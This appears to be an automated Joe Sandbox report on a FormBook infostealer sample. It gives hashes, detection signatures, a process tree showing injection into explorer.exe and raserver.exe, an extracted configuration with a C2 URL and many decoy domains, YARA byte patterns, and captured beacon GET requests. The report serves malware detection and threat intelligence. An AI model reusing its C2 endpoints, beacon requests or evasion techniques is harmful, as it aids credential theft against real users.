Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report XhU4EXUp0x.exe

Overview

General Information

Sample Name:XhU4EXUp0x.exe
Analysis ID:433531
MD5:49c83eceb8a816b959a778e5f2e78801
SHA1:ead9055c813de47edfec5bc46a0d896df4b4af2e
SHA256:2f4d0e2ce90ab2c35dcba4c85e38346eae6ac2cef0f939ccdd21cade4d6343ca
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM3
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XhU4EXUp0x.exe (PID: 6968 cmdline: 'C:\Users\user\Desktop\XhU4EXUp0x.exe' MD5: 49C83ECEB8A816B959A778E5F2E78801)
    • XhU4EXUp0x.exe (PID: 6076 cmdline: C:\Users\user\Desktop\XhU4EXUp0x.exe MD5: 49C83ECEB8A816B959A778E5F2E78801)
      • explorer.exe (PID: 3424 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • raserver.exe (PID: 6340 cmdline: C:\Windows\SysWOW64\raserver.exe MD5: 2AADF65E395BFBD0D9B71D7279C8B5EC)
          • cmd.exe (PID: 3416 cmdline: /c del 'C:\Users\user\Desktop\XhU4EXUp0x.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x183f9:$sqlite3step: 68 34 1C 7B E1
    • 0x1850c:$sqlite3step: 68 34 1C 7B E1
    • 0x18428:$sqlite3text: 68 38 2A 90 C5
    • 0x1854d:$sqlite3text: 68 38 2A 90 C5
    • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
    00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.XhU4EXUp0x.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.XhU4EXUp0x.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.XhU4EXUp0x.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x183f9:$sqlite3step: 68 34 1C 7B E1
        • 0x1850c:$sqlite3step: 68 34 1C 7B E1
        • 0x18428:$sqlite3text: 68 38 2A 90 C5
        • 0x1854d:$sqlite3text: 68 38 2A 90 C5
        • 0x1843b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18563:$sqlite3blob: 68 53 D8 7F 8C
        3.0.XhU4EXUp0x.exe.400000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.0.XhU4EXUp0x.exe.400000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b317:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c31a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.yellow-wink.com/nff/"], "decoy": ["shinseikai.site", "creditmystartup.com", "howtovvbucks.com", "betterfromthebeginning.com", "oubacm.com", "stonalogov.com", "gentrypartyof8.com", "cuesticksandsupplies.com", "joelsavestheday.com", "llanobnb.com", "ecclogic.com", "miempaque.com", "cai23668.com", "miscdr.net", "twzhhq.com", "bloomandbrewcafe.com", "angcomleisure.com", "mafeeboutique.com", "300coin.club", "brooksranchhomes.com", "konversiondigital.com", "dominivision.com", "superiorshinedetailing.net", "thehomechef.global", "dating-web.site", "gcbsclubc.com", "mothererph.com", "pacleanfuel.com", "jerseryshorenflflagfootball.com", "roberthyatt.com", "wwwmacsports.com", "tearor.com", "american-ai.com", "mkyiyuan.com", "gempharmatechllc.com", "verdijvtc.com", "zimnik-bibo.one", "heatherdarkauthor.net", "dunn-labs.com", "automotivevita.com", "bersatubagaidulu.com", "gorillarecruiting.com", "mikecdmusic.com", "femuveewedre.com", "onyxmodsllc.com", "ooweesports.com", "dezeren.com", "foeweifgoor73dz.com", "sorchaashe.com", "jamiitulivu.com", "jifengshijie.com", "ranchfiberglas.com", "glendalesocialmediaagency.com", "icuvietnam.com", "404hapgood.com", "planetturmeric.com", "danfrem.com", "amazonautomationbusiness.com", "switchfinder.com", "diversifiedforest.com", "findnehomes.com", "rsyueda.com", "colombianmatrimony.com", "evan-dawson.info"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: XhU4EXUp0x.exeVirustotal: Detection: 21%Perma Link
          Source: XhU4EXUp0x.exeReversingLabs: Detection: 26%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: XhU4EXUp0x.exeJoe Sandbox ML: detected
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: XhU4EXUp0x.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: XhU4EXUp0x.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: Binary string: C:\Users\Administrator\Desktop\Client\Temp\YfQkSBryuS\src\obj\Debug\ProfileOptimization.pdb source: XhU4EXUp0x.exe
          Source: Binary string: wntdll.pdbUGP source: XhU4EXUp0x.exe, 00000003.00000002.707641443.0000000001930000.00000040.00000001.sdmp, raserver.exe, 0000000C.00000002.912987032.0000000004BFF000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: XhU4EXUp0x.exe, raserver.exe
          Source: Binary string: RAServer.pdb source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: RAServer.pdbGCTL source: XhU4EXUp0x.exe, 00000003.00000002.707590458.000000000169A000.00000004.00000020.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.669343721.0000000005A00000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 4x nop then mov dword ptr [ebp-18h], 00000000h
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 4x nop then pop edi

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.yellow-wink.com/nff/
          Source: global trafficHTTP traffic detected: GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1Host: www.gentrypartyof8.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1Host: www.rsyueda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 66.235.200.146 66.235.200.146
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: LEASEWEB-USA-SEA-10US LEASEWEB-USA-SEA-10US
          Source: global trafficHTTP traffic detected: GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1Host: www.gentrypartyof8.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1Host: www.rsyueda.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.gentrypartyof8.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: XhU4EXUp0x.exe, 00000000.00000002.653505336.00000000026B1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000005.00000000.660621066.0000000002B50000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000005.00000000.681251721.000000000B976000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: XhU4EXUp0x.exe, 00000000.00000002.653535453.00000000026EF000.00000004.00000001.sdmpString found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css
          Source: XhU4EXUp0x.exe, 00000000.00000002.653237651.00000000009F0000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.707404802.00000000015D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000000.652221131.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.911907238.0000000000A90000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.912137473.0000000000E80000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.912162573.0000000000EB0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.655856649.00000000037F7000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.706990052.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.654291332.00000000036B9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.707426607.0000000001600000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.XhU4EXUp0x.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.XhU4EXUp0x.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.XhU4EXUp0x.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.0.XhU4EXUp0x.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419D50 NtCreateFile,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419E00 NtReadFile,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419E80 NtClose,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419DA9 NtReadFile,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419E7A NtClose,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_00419F2D NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019999A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019998F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_019995D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\XhU4EXUp0x.exeCode function: 3_2_01999780 NtMapViewOfSection,LdrInitializeThunk,
